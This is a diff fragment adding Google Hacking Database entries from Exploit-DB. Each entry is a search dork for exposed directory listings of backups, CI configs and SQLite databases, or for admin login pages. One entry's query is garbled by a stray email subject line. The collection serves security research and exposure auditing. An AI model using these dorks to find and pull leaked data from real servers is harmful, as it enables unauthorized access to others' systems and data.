+ intext:"Index of" intext:"backend/"
+ # Google Dork: intext:"Index of" intext:"backend/"
+# Files Containing Juicy Info
+# Date:20/04/2023
+# Exploit Author: PARAG BAGUL
+ intext:"Index of" intext:"backend/"
+ https://www.google.com/search?q=intext:"Index of" intext:"backend/"
+
+ 2023-04-20
+ PARAG BAGUL
+
+
+ 8161
+ https://www.exploit-db.com/ghdb/8161
+ Files Containing Juicy Info
+ intext:"Index of" intext:"backup.tar"
+ # Google Dork: intext:"Index of" intext:"backup.tar"
+# Files Containing Juicy Info
+# Date:20/04/2023
+# Exploit Author: PARAG BAGUL
+ intext:"Index of" intext:"backup.tar"
+ https://www.google.com/search?q=intext:"Index of" intext:"backup.tar"
+
+ 2023-04-20
+ PARAG BAGUL
+
+
+ 8165
+ https://www.exploit-db.com/ghdb/8165
+ Files Containing Juicy Info
+ intext:"Index of" intext:"bitbucket-pipelines.yml"
+ # Google Dork: intext:"Index of" intext:"bitbucket-pipelines.yml"
+# Files Containing Juicy Info
+# Date:20/04/2023
+# Exploit Author: PARAG BAGUL
+ intext:"Index of" intext:"bitbucket-pipelines.yml"
+ https://www.google.com/search?q=intext:"Index of" intext:"bitbucket-pipelines.yml"
+
+ 2023-04-20
+ PARAG BAGUL
+
7717
https://www.exploit-db.com/ghdb/7717
@@ -38694,6 +38769,21 @@ misconfigured servers.
2021-11-09
Parth Surati
+
+ 8164
+ https://www.exploit-db.com/ghdb/8164
+ Files Containing Juicy Info
+ intext:"Index of" intext:"plugin/"
+ # Google Dork: intext:"Index of" intext:"plugin/"
+# Files Containing Juicy Info
+# Date:20/04/2023
+# Exploit Author: PARAG BAGUL
+ intext:"Index of" intext:"plugin/"
+ https://www.google.com/search?q=intext:"Index of" intext:"plugin/"
+
+ 2023-04-20
+ PARAG BAGUL
+
7683
https://www.exploit-db.com/ghdb/7683
@@ -47987,6 +48077,21 @@ Author: Abhinav Porwal
2021-10-27
MD. Rimel
+
+ 8167
+ https://www.exploit-db.com/ghdb/8167
+ Files Containing Juicy Info
+ intitle:index of db.sqlite3
+ # Google Dork: intitle:index of db.sqlite3
+# Files Containing Juicy Info
+# Date:20/04/2023
+# Exploit Author: Shebu
+ Re: Thank you for your submission! Re: intitle:index of db.sqlite3
+ https://www.google.com/search?q=Re: Thank you for your submission! Re: intitle:index of db.sqlite3
+
+ 2023-04-20
+ Shebu
+
7368
https://www.exploit-db.com/ghdb/7368
@@ -78027,6 +78132,21 @@ https://ch.linkedin.com/in/schmidbruno
2021-11-15
Arindam Saha
+
+ 8168
+ https://www.exploit-db.com/ghdb/8168
+ Pages Containing Login Portals
+ inurl: "/admin" intitle:"Admin Login"
+ # Google Dork: inurl: "/admin" intitle:"Admin Login"
+# Pages Containing Login Portals
+# Date:20/04/2023
+# Exploit Author: Bhavin Amesara
+ inurl: "/admin" intitle:"Admin Login"
+ https://www.google.com/search?q=inurl: "/admin" intitle:"Admin Login"
+
+ 2023-04-20
+ Bhavin Amesara
+
7387
https://www.exploit-db.com/ghdb/7387